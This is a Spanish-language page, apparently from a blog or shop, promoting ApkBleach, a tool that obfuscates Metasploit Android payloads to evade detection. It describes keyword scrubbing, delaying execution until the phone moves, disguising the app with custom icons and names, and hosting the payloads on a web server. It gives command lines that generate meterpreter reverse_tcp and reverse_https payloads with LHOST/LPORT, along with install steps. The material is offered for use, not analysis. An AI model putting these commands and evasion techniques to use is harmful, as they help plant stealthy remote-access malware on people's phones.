ApkBleach Herramienta de Ofuscación de Payloads de Android

ApkBleach: Herramienta de Ofuscación de Payloads de Android

ApkBleach fue desarrollado específicamente para ofuscar las cargas útiles (payloads) de Android generadas por el framework metasploit en un intento de evadir la detección.

La ofuscación que se lleva a cabo intenta evadir la detección con dos métodos principales. El primer método es estrictamente para la detección de la carga útil descompilada. Por defecto, metasploit genera una aplicación Android llena de las palabras clave metasploit y payload. Reemplazar esas palabras clave con cadenas aleatorias y aleatorizar los nombres de los archivos es un buen primer paso para ofuscar la típica carga útil de metasploit android. El siguiente método es cambiar la forma en que se ejecuta el payload. El payload por defecto generado por metasploit se ejecuta al crear o simplemente al abrir la aplicación. Este método de ofuscación utiliza la actividad del acelerómetro del dispositivo para lanzar el payload. Así que el payload de metasploit esperará al movimiento físico del dispositivo de destino antes de ejecutar el payload.

Este software también automatiza el proceso de cambiar el icono de la app, cambiar el nombre de la app, firmar el .apk, alinear el .apk e instalar o actualizar apktool.

Interfaz de ApkBleach
Interfaz de ApkBleach

Nueva función de la interfaz de usuario de despliegue:

App Interfaz Usuario de ApkBleach
App Interfaz Usuario de ApkBleach

Características

  • Interfaz de usuario para el despliegue de cargas útiles
  • Edición de permisos línea por línea. El software revisará cada permiso del archivo manifest y te preguntará si deseas eliminarlo.
  • Opción de sigilo. Esto ejecuta la carga útil fuera del acelerómetro de los dispositivos en lugar de en abierto. Esta opción también te permite elegir cuántas sesiones quieres que se generen del exploit.
  • Inyección de iconos personalizados. Esto permite a los usuarios modificar el icono de la aplicación que aparece en la pantalla de inicio de un dispositivo Android. Puedes elegir de un icono apkbleach proporcionado o puedes suministrar el tuyo propio. Apkbleach hará todo el trabajo por ti.
  • Cambia el nombre de la aplicación por el nombre que hayas elegido como archivo de salida.
  • Borra toda la aplicación de cualquier mención del nombre “metasploit” , “stage” o “payload“. Hay muchos por cierto. enviar pruebas de seguridad con una aplicación que contiene el nombre metasploit es simplemente gracioso 🙂
  • Añade padnops (?) a PAYLOAD
  • Firma el apk con jarsigner. msfenom produce aplicaciones sin firmar
  • Alinea el apk en zip
  • Función de actualización de Apktool. Si el software detecta que estás usando la versión 2.4.1-dirty de apktool, que es la versión de los mantenedores de paquetes de Kali, te preguntará si quieres reemplazarla con la última versión de ibot peaches. Esto es una buena idea porque entra en conflicto con la opción msfvenom -x y arroja un error de número de versión. Por no hablar de los problemas que ha dado a los usuarios en el pasado.

Uso

Tienes los siguientes comandos a disposición:

apkbleach -g android/meterpreter/reverse_https LHOST=Address LPORT=port -s 3 -i BLEACH_settings --edit-permissions -o /var/www/html/payload.apk

apkbleach -g android/meterpreter/reverse_tcp LHOST=address LPORT=port -s 3 --edit-permissions --deploy-all

 apkbleach --list-payloads

 apkbleach --list-icons

 apkbleach --clear-cache

Argumentos opcionales:

  -h, --help            show this help message and exit

  -g [PAYLOAD] [LHOST] [LPORT]
                    Generates a payload
                    
  -s [number of sessions to spawn 1-5]
                    Executes payload on accelerometer activity instead of on open
                    
  -i [BLEACH_icon..] or [path/to/custom/icon]
                    Injects an icon
                    
  -o [output/path/for/file.apk]
                    Path to output apk
                    
  --edit-permissions    Enables permission editing in apk's manifest
  
  --deploy-all          Deploys each available icon as a payload with the apache2 server with a web interface

  --list-payloads       List available icons

  --list-icons          List available icons

  --clear-cache         Allows prompt whether to keep package maintainers version apktool

Instalación

Después de clonar o descargar el repositorio, entra en el directorio apkbleach y ejecuta install.sh:

git clone https://github.com/graylagx2/ApkBleach.git
cd apkbleach
bash install.sh

o,

cd apkbleach
chmod +x install.sh
./install.sh

Vídeo Demostración

Mi Carro Close (×)

Tu carrito está vacío
Ver tienda